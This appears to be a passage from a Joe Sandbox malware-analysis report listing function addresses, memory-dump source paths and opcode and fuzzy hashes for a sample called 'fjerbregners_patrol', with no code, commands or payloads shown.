                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ec546215b23f57ea50fa141a414a345ce66ad09198e2ec8d7e8f66c71286bd60
                                                                                                                                                                                            • Instruction ID: 42088f73a23c658606529bcc07bc0f44e88c135e0990064c2fa007a3ec747df1
                                                                                                                                                                                            • Opcode Fuzzy Hash: ec546215b23f57ea50fa141a414a345ce66ad09198e2ec8d7e8f66c71286bd60
                                                                                                                                                                                            • Instruction Fuzzy Hash: D9F067B2A11780DFC755DF68E100B18BBF0FB44624F24C5ABC1569BB91DB329502CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D29A48 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4bf63127405c015fb59e3d0f84656affe0807514287ab9427d7127e604e59fd7
                                                                                                                                                                                            • Instruction ID: c4a0f92e86a7eacc262af9b3a10c27221fe2918c469524fb8a31caa36f4ca96d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bf63127405c015fb59e3d0f84656affe0807514287ab9427d7127e604e59fd7
                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F0E2399627948FE311C724C580B4177EDBB00FB8F9D4065E465C7902D734E8C0CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF2AE Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f327d06a6c9cedc3b2a70bb792a48d6dd88a7fe622f85668c123302cef8acf76
                                                                                                                                                                                            • Instruction ID: 00ed3bbc94447dc68fa6393f063bdab18fcaea68cd2e26f881b279c609493ff7
                                                                                                                                                                                            • Opcode Fuzzy Hash: f327d06a6c9cedc3b2a70bb792a48d6dd88a7fe622f85668c123302cef8acf76
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F08271E11348ABDB04DBA9C956A5E7BF8EF08704F500098F601EB280D974D901C728
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D27128 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 14b82b72c6275494883c56489885565a4bf11f85dfae2043cb30087b0e179a15
                                                                                                                                                                                            • Instruction ID: d5f6c0bbd10171215d16c795d7e1e4e11ce8363dfed3d5908375155355cfdd63
                                                                                                                                                                                            • Opcode Fuzzy Hash: 14b82b72c6275494883c56489885565a4bf11f85dfae2043cb30087b0e179a15
                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF08275D917949FE712DB65C144B417BF8AB85FB8FCD8061D829C7902C724E8C0C690
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DC505B Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b43548b1acd963670cc585eaea0a7818c3dd85d017bf0737618535293c0930af
                                                                                                                                                                                            • Instruction ID: d9fa460064993cca3f0988bc88e4a67aa7c8beba1cfaf1691dd2b3f7a95ac223
                                                                                                                                                                                            • Opcode Fuzzy Hash: b43548b1acd963670cc585eaea0a7818c3dd85d017bf0737618535293c0930af
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1F08C70E11348ABDB04DBB9D556E9EBBF8AF09704F500498B601EB680EA74E9018B68
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF7CF Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1f29664fae910ca6a4ddff8d6e4558ecd38d30158873223b3132e9a9413fe11d
                                                                                                                                                                                            • Instruction ID: efb99aa8e6be119d12d7cc1a6017ef584980f5336c60ae2a1231f5c77ae8e238
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f29664fae910ca6a4ddff8d6e4558ecd38d30158873223b3132e9a9413fe11d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF082B1E01348ABDB04DBB9C946A5E77F8EF08704F400098F501EB280D974D9008728
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF717 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5b71d781d90052382417f11a93c999c5d94d381e794a5825f9498f68869444a0
                                                                                                                                                                                            • Instruction ID: 09521066fbb4ec0fe6e5350dec7c9846d231c99fe9642151a95ed360c60f2484
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b71d781d90052382417f11a93c999c5d94d381e794a5825f9498f68869444a0
                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F08C75E01348ABDB04DBA9C94AA9EB7F8AF08704F400098F601EB280DA74E9008768
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7B5D3 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1075dac146392a14f3db52c8c986180df7b15f0e574ef2c54f0947a9a4f506e7
                                                                                                                                                                                            • Instruction ID: e42df98290462b0dc43d270bd81b1fdfa074fb06bf60768a0737d60a7419090a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1075dac146392a14f3db52c8c986180df7b15f0e574ef2c54f0947a9a4f506e7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F06572A01258BBEF30CE89CD05F9AB6ACDB81BB5F151175A610EB1C0D6B49E00CAA5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2174A Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 39d02887a6d1ef4178fd5db213f2a4860a2fdb36925614c0cdb3312e21ec3ac8
                                                                                                                                                                                            • Instruction ID: 8ace39d8f11928eabb86300d04c4f4d3c337a81d3e470f391047082f6da1ec23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 39d02887a6d1ef4178fd5db213f2a4860a2fdb36925614c0cdb3312e21ec3ac8
                                                                                                                                                                                            • Instruction Fuzzy Hash: D5E092B2A01921ABD3115A58EC00F66779EEBE5A51F0A4435E944D7214DA28DD06C7F0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D85BC0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                            • Instruction ID: 17a42afc38de7d71c1ae3641d2ef4c281e7efee4dc12e7ef8c8b8d0420244dae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43F015B21043049FE3118F09D844F52BBAAEB55764F56C026E6489B660D279EC40CFA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D254E0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                                                                            • Instruction ID: 293c02e53db6751b95fb2670307f84d422f5b3d02ad8437c3fa1d0ee6e469fd8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0E532541711AFD3210A1ACC00F02FF59FB40BB1F048225E598439908A60EC01CAE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE78E1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 512c10aa3a75b0ede84eabe7668f11e79ec4955b2cbb6fb1b8fa372bc038f46a
                                                                                                                                                                                            • Instruction ID: 73bfd49b58b231f3c804dd49d99cee138a36c193a9821b644c1fa7eefeed2a9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 512c10aa3a75b0ede84eabe7668f11e79ec4955b2cbb6fb1b8fa372bc038f46a
                                                                                                                                                                                            • Instruction Fuzzy Hash: B3E0683261034AD3E732AA10C401FAAB7AEAF81B45F098471F440CF950EBA1ED52D3D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DC3336 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                                                                                                                            • Instruction ID: 1643afac0d8ec59347b02cfd888bae421061e8b7cb24b4ae090eb61d14aafe6f
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E065B2A20340BBE726DB48CD41FA673ACEB01B20F580258B125D38D0DAB4FE40CA60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7D9C7 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 668385de0503e0c3d5b13582292ea6d36033133e3fb43a77e13c6f55b3e474ed
                                                                                                                                                                                            • Instruction ID: 4075e6d4772a7da775150ceaaebc5470a56edf2e19c733b1eddb7aab388d9d4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 668385de0503e0c3d5b13582292ea6d36033133e3fb43a77e13c6f55b3e474ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0B2B3E65784CEDB91EF68D5007087BE0FB44665F10C56AD112A7A80D77A59468F10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D01B80 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6f13dcd28af7573c4163a2ffaf55939ee978da1d63d9c6b5489d9f8baee956ba
                                                                                                                                                                                            • Instruction ID: c35debe2238c31a4b93bfbcea0343f14a236710a940d744b4e9e444df6ef838d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f13dcd28af7573c4163a2ffaf55939ee978da1d63d9c6b5489d9f8baee956ba
                                                                                                                                                                                            • Instruction Fuzzy Hash: E8E0203DA0176447D703879640C094B739D9F83EA4B098195D45587F00EF68DD40CEE5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1D9CE Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 129b7c41e91761c3dd6a98ce814cf31cfbe377d78e8ac8b133d377f3e34eb926
                                                                                                                                                                                            • Instruction ID: e403ea4e84e9822e41a2e36a4f387972f7d31d19e8a8434d83179e98527a3433
                                                                                                                                                                                            • Opcode Fuzzy Hash: 129b7c41e91761c3dd6a98ce814cf31cfbe377d78e8ac8b133d377f3e34eb926
                                                                                                                                                                                            • Instruction Fuzzy Hash: CBF08C71950B508FE764CF18E100BA273A9EB84724F14865CE01E8F695C77A9C83CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D85660 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
                                                                                                                                                                                            • Instruction ID: 5b029738b7d3696bf6c028b41045fb18963091468b29204ff1b9914c04753271
                                                                                                                                                                                            • Opcode Fuzzy Hash: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E08C32150744EFE3219A19C805F82BBE9EB15775F04C82AE5998BD60C7B9F880CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB502 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                            • Instruction ID: 3fb8afac2bbebf1da456e75f2e9ac43ec610a7528c6199ff944a46f06873cd17
                                                                                                                                                                                            • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D05E32452B50AAC7322F24ED05FA37AB5AF40F15F050528B1469ACF086A1ED85DAA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB9B0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1ce48c692328559c5ea89c7542e9e85a8e831fd0de7584cb87acb83bc22fe3ef
                                                                                                                                                                                            • Instruction ID: 84bb85276cbb82efcdc2732d41669dfd4f80063fdb435ed8288321741473a14e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ce48c692328559c5ea89c7542e9e85a8e831fd0de7584cb87acb83bc22fe3ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EC08C32190248BBC722AA95CD01F027B69E790B60F000021B60446960C532E820D998
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1332D Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                            • Instruction ID: 8339564221a5a308c14d95d190c590dbadc47d8a1018618836b92af6a7bc2f96
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AC08CB8D51380ABEB1B5B00D910B283A58BB00F49F8C019CAA001DCA2C76AD821C60C
